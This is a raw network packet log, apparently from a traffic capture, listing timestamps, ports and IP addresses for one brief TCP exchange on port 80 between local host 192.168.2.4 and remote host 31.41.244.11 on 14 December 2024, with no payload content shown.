Dec 14, 2024 23:58:11.370520115 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.372263908 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.372354984 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.372394085 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.372437000 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.373979092 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.374047995 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.374105930 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.374145031 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.375745058 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.375794888 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.375852108 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.375890970 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.377505064 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.377552032 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.377629995 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.377670050 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.379244089 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.379288912 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.379364014 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.379407883 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.380975008 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.381020069 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.381087065 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.381128073 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.382638931 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.382683039 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.382760048 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.382802963 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.384340048 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.384390116 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.384469986 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.384519100 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.386059999 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.386109114 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.386173010 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.386214018 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.387806892 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.387851000 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.387902975 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.387944937 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.389421940 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.389466047 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.389539003 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.389581919 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.391236067 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.391283035 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.391310930 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.391360044 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.392802000 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.392846107 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.392915010 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.392952919 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.394514084 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.394557953 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.394640923 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.394685030 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.396261930 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.396306038 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.396338940 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.396379948 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.397960901 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.398005962 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.398034096 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.398075104 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.399578094 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.399621010 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.399694920 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.399736881 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.401292086 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.401336908 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.401417971 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.401459932 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.403189898 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.403233051 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.403315067 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.403361082 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.404681921 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.404726028 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.404813051 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.404856920 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.406390905 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.406435966 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.406464100 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.406507969 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.408098936 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.408142090 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.408188105 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.408229113 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.409595013 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.409734964 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.409738064 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.409780025 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.411139965 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.411194086 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.411273956 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.411324978 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.412713051 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.412769079 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.412823915 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.412872076 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.414266109 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.414316893 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.414361000 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.414421082 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.415754080 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.415806055 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.415879965 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.415925980 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.417311907 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.417385101 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.417431116 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.417493105 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.418862104 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.418915033 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.419001102 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.419048071 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.420397997 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.420447111 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.420523882 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.420569897 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.421955109 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.422004938 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.422066927 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.422112942 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.423472881 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.423521996 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.423578978 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.423624992 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.425018072 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.425066948 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.425139904 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.425223112 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.426561117 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.426614046 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.426668882 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.426717997 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.428148985 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.428199053 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.428272009 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.428318977 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.429697037 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.429769039 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.429912090 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.429971933 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.431163073 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.431226015 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.431315899 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.431370020 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.432739973 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.432789087 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.432852983 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.432899952 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.434264898 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.434314966 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.434381962 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.434434891 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.435806990 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.435858965 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.435920000 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.435966969 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.437367916 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.437423944 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.437515974 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.437566996 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.438893080 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.438968897 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.438996077 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.439058065 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.440474987 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.440543890 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.440561056 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.440612078 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.441963911 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.442029953 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.442058086 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.442106962 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.548099995 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.548197985 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.548253059 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.548314095 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.548646927 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.548700094 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.548721075 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.548768997 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.549781084 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.549832106 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.549860954 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.549910069 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.550929070 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.550981998 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.551049948 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.551099062 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.552128077 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.552184105 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.552261114 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.552309036 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.553407907 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.553430080 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.553467035 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.553495884 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.554363966 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.554420948 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.554505110 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.554555893 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.555537939 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.555593014 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.555674076 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.555731058 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.556627989 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.556685925 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.556732893 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.556787968 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.557729006 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.557786942 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.557874918 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.557928085 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.558845043 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.558902025 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.558968067 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.559020996 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.559957027 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.560034037 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.560082912 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.560134888 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.561038971 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.561096907 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.561254025 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.561323881 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.562232971 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.562285900 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.562371969 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.562428951 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.563182116 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.563235998 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.563308954 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.563366890 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.564232111 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.564294100 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.564352036 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.564399004 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.565323114 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.565380096 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.565429926 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.565490007 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.566358089 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.566416025 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.566519022 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.566566944 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.567401886 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.567459106 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.567527056 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.567579031 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.568509102 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.568566084 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.568619013 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.568666935 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.569502115 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.569557905 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.569624901 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.569677114 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.570602894 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.570674896 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.570714951 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.570768118 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.571634054 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.571690083 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.571757078 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.571814060 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.572670937 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.572737932 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.572783947 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.572835922 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.573729038 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.573787928 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.573853016 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.573909044 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.574784994 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.574840069 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.574889898 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.574943066 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.575840950 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.575895071 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.575958967 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.576010942 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.576921940 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.576980114 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.577035904 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.577085018 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.577949047 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.578022957 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.578097105 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.578155041 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.579045057 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.579097986 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.579121113 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.579169989 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.580091000 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.580152035 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.580178976 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.580221891 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.581101894 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.581213951 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.581285954 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.581321955 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.582153082 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.582218885 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.582256079 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.582304955 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.583219051 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.583271980 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.583340883 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.583394051 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.584259987 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.584311962 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.584391117 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.584443092 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.585375071 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.585431099 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.585465908 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.585510969 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.586388111 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.586455107 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.586499929 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.586549997 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.587426901 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.587481022 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.587553024 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.587601900 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.588505983 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.588558912 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.588603973 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.588651896 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.589570999 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.589629889 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.589663982 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.589710951 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.590614080 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.590667963 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.590732098 CET	80	49770	31.41.244.11	192.168.2.4
